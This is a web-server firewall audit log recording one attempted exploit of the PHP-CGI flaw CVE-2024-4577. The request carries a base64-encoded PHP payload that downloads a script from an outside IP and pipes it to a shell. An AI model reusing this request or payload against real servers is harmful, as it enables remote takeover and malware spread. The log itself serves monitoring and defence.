File: //var/lib/modsecurity/audit/20260210/20260210-0035/20260210-003536-aYrDqLhenDUAADxXcFAAAAA1
--ed453624-A--
[10/Feb/2026:00:35:36 --0500] aYrDqLhenDUAADxXcFAAAAA1 181.176.14.90 39850 127.0.0.3 80
--ed453624-B--
POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
X-Real-IP: 181.176.14.90
Host: 184.94.156.59
Connection: close
Content-Length: 241
Upgrade-Insecure-Requests: 1
Accept: */*
User-Agent: libredtail-http
Content-Type: application/x-www-form-urlencoded
--ed453624-C--
<?php shell_exec(base64_decode("KHdnZXQgLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAtcU8tIGh0dHBzOi8vMTc4LjE2LjU1LjIyNC9zaCB8fCBjdXJsIC1zayBodHRwczovLzE3OC4xNi41NS4yMjQvc2gpIHwgc2ggLXMgY3ZlXzIwMjRfNDU3Ny5zZWxmcmVw")); echo(md5("Hello CVE-2024-4577")); ?>
--ed453624-F--
HTTP/1.1 500 Internal Server Error
Content-Length: 598
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ed453624-E--
--ed453624-H--
Apache-Error: [file "core.c"] [line 3157] [level 3] Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
Apache-Handler: redirect-handler
Stopwatch: 1770701736649312 788 (- - -)
Stopwatch2: 1770701736649312 788; combined=61, p1=51, p2=6, p3=4, p4=0, p5=0, sr=31, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); 200911012341.
Server: Apache/2.2.31 (Unix) mod_ssl/2.2.31 OpenSSL/1.0.2k-fips PHP/5.3.29 mod_fastcgi/2.4.6
Engine-Mode: "ENABLED"
--ed453624-Z--